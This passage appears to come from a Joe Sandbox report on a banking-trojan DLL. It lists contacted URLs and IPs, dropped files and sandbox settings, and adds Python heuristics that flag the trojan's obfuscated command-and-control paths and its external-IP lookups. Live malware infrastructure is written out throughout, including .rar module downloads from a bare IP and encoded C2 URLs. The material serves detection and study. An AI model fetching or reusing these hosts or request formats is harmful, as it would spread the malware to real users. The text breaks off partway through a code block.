http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk | true | Avira URL Cloud: safe | unknown
http://193.56.146.127/cook64.rar | true | Avira URL Cloud: malware | unknown
http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp | true | Avira URL Cloud: malware | unknown
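The contacted URLs fall into two shapes: long paths under /images/ or /drew/ built from pseudo-random segments that carry `_2B`, `_2F` and `_3D` (the `+`, `/` and `=` of a base64 blob with the `%` of URL encoding replaced by `_`) and end in a decoy .gif/.bmp/.jlk name, and short module downloads from a bare IP (stilak32.rar, cook32.rar). Each long URL is unique, which is why a per-URL reputation lookup is unreliable here: Avira rates the .gif and .bmp requests as malware but the .jlk requests to the same infrastructure as safe. The Python below is an added example for this page, not Joe Sandbox or Avira logic; the path shape is the widely documented Ursnif/ISFB request format, but the numeric thresholds are my own assumptions, and the proxy-log lines are constructed around URLs copied from the tables above.

```python
"""URL-shape heuristics for the two request families in this report.

Added example, not Joe Sandbox or Avira logic. Family 1: long obfuscated
path whose segments carry _2B / _2F / _3D markers and end in a decoy
.gif/.bmp/.jlk name. Family 2: single .rar name fetched from a bare IPv4
host. Thresholds are assumptions; log lines are constructed.
"""
import re
from urllib.parse import urlsplit

B64_MARKER = re.compile(r"_2[BF]|_3D")        # '+', '/', '=' with '%' swapped for '_'
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
MIN_SEGMENTS = 5      # assumption: benign paths rarely nest this deep with random names
MIN_PATH_LEN = 150    # assumption
MIN_MARKERS = 3       # assumption
DECOY_EXTS = (".gif", ".bmp", ".jlk")


def obfuscated_c2_path(url):
    """Reason string if `url` has the long encoded-path shape, else None."""
    path = urlsplit(url).path
    segments = [s for s in path.split("/") if s]
    markers = len(B64_MARKER.findall(path))
    ext = path[path.rfind("."):].lower() if "." in path else ""
    if (len(segments) >= MIN_SEGMENTS and len(path) >= MIN_PATH_LEN
            and markers >= MIN_MARKERS and ext in DECOY_EXTS):
        return (f"obfuscated path: {len(segments)} segments, "
                f"{markers} encoded base64 markers, decoy extension {ext}")
    return None


def module_download(url):
    """Reason string if `url` is one .rar name served from a bare IPv4 host, else None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    segments = [s for s in parts.path.split("/") if s]
    if IPV4.fullmatch(host) and len(segments) == 1 and segments[0].lower().endswith(".rar"):
        return f"module download from bare IP: {segments[0]}"
    return None


def classify(url):
    """First matching reason for either family, or None for an unremarkable URL."""
    return obfuscated_c2_path(url) or module_download(url)


def scan_proxy_log(lines):
    """Lines are 'client_ip url'; return (client_ip, url, reason) for every hit."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 2:
            continue
        reason = classify(fields[1])
        if reason:
            hits.append((fields[0], fields[1], reason))
    return hits


# Constructed proxy-log lines; the URLs are copied from the report's URL tables.
SAMPLE_LOG = [
    "10.0.0.5 http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif",
    "10.0.0.5 http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk",
    "10.0.0.5 http://193.56.146.127/stilak32.rar",
    "10.0.0.7 https://www.disneyplus.com/legal/privacy-policy",
    "10.0.0.7 https://github.com/Pester/Pester",
]

if __name__ == "__main__":
    for client, url, reason in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} {reason}\n    {url[:80]}...")
```

Both .jlk requests and the .gif request match the first family regardless of what a reputation feed says about the individual URL, and the stilak32.rar fetch matches the second; the two legitimate URLs match neither. Tune MIN_SEGMENTS and MIN_MARKERS against your own proxy data before deploying: some CDN and tracking URLs are long, but they rarely combine depth, random segment names and the `_2B`/`_2F` markers at once.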
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights | RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://curlmyip.net | RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://curlmyip.netJv1GYc8A8hCBIeVDfile://c: | RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.adobp/ | RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://ns.adobe.cmg | RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.tiktok.com/legal/report/feedback | RuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.osofts/Microt0 | powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://twitter.com/spotify | RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.hotspotshield.com/ | RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.disneyplus.com/legal/privacy-policy | RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ipinfo.io/ip | RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://constitution.org/usdeclar.txt | rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.hotspotshield.com/terms/ | RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.pango.co/privacy | RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ns.adobe.ux | RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.micro/1 | RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://help.disneyplus.com. | RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Legend for the Reputation column:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Contacted IPs (public)
IP | Domain | Country | ASN | ASN Name | Malicious
193.56.146.127 | unknown | unknown | 10753 | LVLT-10753US | true
116.121.62.237 | cabrioxmdes.at | Korea Republic of | 9578 | CJNET-ASCheiljedangCoIncKR | true
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true

Contacted IPs (private)
IP
192.168.2.1
                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:620323
Start date and time:2022-05-04 16:17:34 +02:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 12m 22s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:2oCOO5LbPu.dll
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:48
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:4
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HDC Information:
                                                        • Successful, ratio: 20.6% (good quality ratio 19.7%)
                                                        • Quality average: 82.2%
                                                        • Quality standard deviation: 27%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .dll
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Override analysis time to 240s for rundll32
                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                        • TCP Packets have been reduced to 100
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 13.107.43.16
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, time.windows.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
                                                        • Execution Graph export aborted for target mshta.exe, PID 6576 because there are no executed functions
                                                        • Not all processes were analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: 2oCOO5LbPu.dll
                                                        Time      Type              Description
                                                        16:19:30  API Interceptor   33x Sleep call for process: powershell.exe modified
                                                        No context
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):91
                                                        Entropy (8bit):3.964980110923723
                                                        Encrypted:false
                                                        SSDEEP:3:ApEeKm8RKQB2LI/cAtAFqyLAIRlKFvBFGmWLn:ApEVNB2LI/xyFqyLbgzGdn
                                                        MD5:99BDE3452748E34D6C50275110A6A8D4
                                                        SHA1:E79CB2A8DB7D8490523529D3861F95BA73A20C23
                                                        SHA-256:D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
                                                        SHA-512:19FD529C6FE60BBBE3710FED93F14D723A13AD427431F855ED84F5E5E496B9F3EB8A6E8C31D740239EB225753D52A4F464B489FDBDEFF4477480026263D0F691
                                                        Malicious:false
                                                        Preview:Cookies are no longer stored in files. Please use Internet*Cookie* APIs to access cookies.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):11606
                                                        Entropy (8bit):4.8910535897909355
                                                        Encrypted:false
                                                        SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                                        MD5:F84F6C99316F038F964F3A6DB900038F
                                                        SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                                        SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                                        SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                                        Malicious:false
                                                        Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1192
                                                        Entropy (8bit):5.325275554903011
                                                        Encrypted:false
                                                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                                        MD5:05CF074042A017A42C1877FC5DB819AB
                                                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                                        Malicious:false
                                                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):120
                                                        Entropy (8bit):4.524106603776786
                                                        Encrypted:false
                                                        SSDEEP:3:cPaRhARtt7TSjjhThARtuV/gR01I1/v:oMWbtChWb0gR1/v
                                                        MD5:DF83C2808C7F54E162CE6A66507FBBBE
                                                        SHA1:B8E6CA152AFA7142F928BEF5849C4C54708138C8
                                                        SHA-256:23EB89272AD3DA25605683EA7B3691FA5F76508B19870F023AD55E9FAEE8D1B8
                                                        SHA-512:078BCF94F0EC71037319D9E90A0F60BE335BECFBBC6C60CB05FA5CBF3C3187245E7C9270E8A7F8C90DB8D2391D20DD6A7726EA60B8921ADC1B67144CC19CD233
                                                        Malicious:false
                                                        Preview:Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 102.129.143.40....-------- ..
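The nslookup output above is the implant's external-IP check: the query for myip.opendns.com was sent straight to dns.opendns.com (208.67.222.222), bypassing the host's configured resolver, and the answer (102.129.143.40) is the sandbox's public address, obtained without any HTTP request to a what-is-my-IP site. The following is an added example, not part of the Joe Sandbox report, that parses this nslookup layout, raises a finding when the resolved name is a known what-is-my-IP service, and flags use of a resolver outside an allowlist. The sample text is reconstructed from the preview with CRLF terminators restored; the set of watched names (only myip.opendns.com is on the page) and the trusted-resolver list are assumptions to adapt to your environment.

```python
"""Parse Windows nslookup.exe output and flag external-IP discovery.

Added example for this report; not sandbox output. Assumes the usual
nslookup text layout: a Server/Address block for the resolver, a blank
line, then Name/Address (or Addresses) for the answer.
"""
import re
from typing import Dict, List, Optional

# Names whose only purpose is to echo the caller's public address.
# myip.opendns.com is the one in the dropped file; extending this set
# with other services is an assumption left to the reader.
EXTERNAL_IP_LOOKUP_NAMES = {"myip.opendns.com"}

# Resolvers a host is expected to talk to (assumption: corporate DNS).
TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# Constructed reconstruction of the dropped file; the report renders the
# CRLF terminators as "..".
SAMPLE_NSLOOKUP_OUTPUT = (
    "Server:  dns.opendns.com\r\n"
    "Address:  208.67.222.222\r\n"
    "\r\n"
    "Name:    myip.opendns.com\r\n"
    "Address:  102.129.143.40\r\n"
    "\r\n"
    "-------- \r\n"
)

_FIELD = re.compile(r"^(Server|Address(?:es)?|Name|Aliases):\s*(.*)$", re.I)
_IP = re.compile(r"^[0-9a-fA-F:.]+$")  # bare IPv4/IPv6 continuation line


def parse_nslookup(text: str) -> Dict[str, List[str]]:
    """Split nslookup output into resolver fields and answer fields.

    The first blank-line-separated block is the resolver that was used;
    everything after it is the answer. Banner lines, 'Non-authoritative
    answer:' and the trailing dashes are skipped. 'Addresses:' lists
    extra IPs one per line, which are attached to the preceding key.
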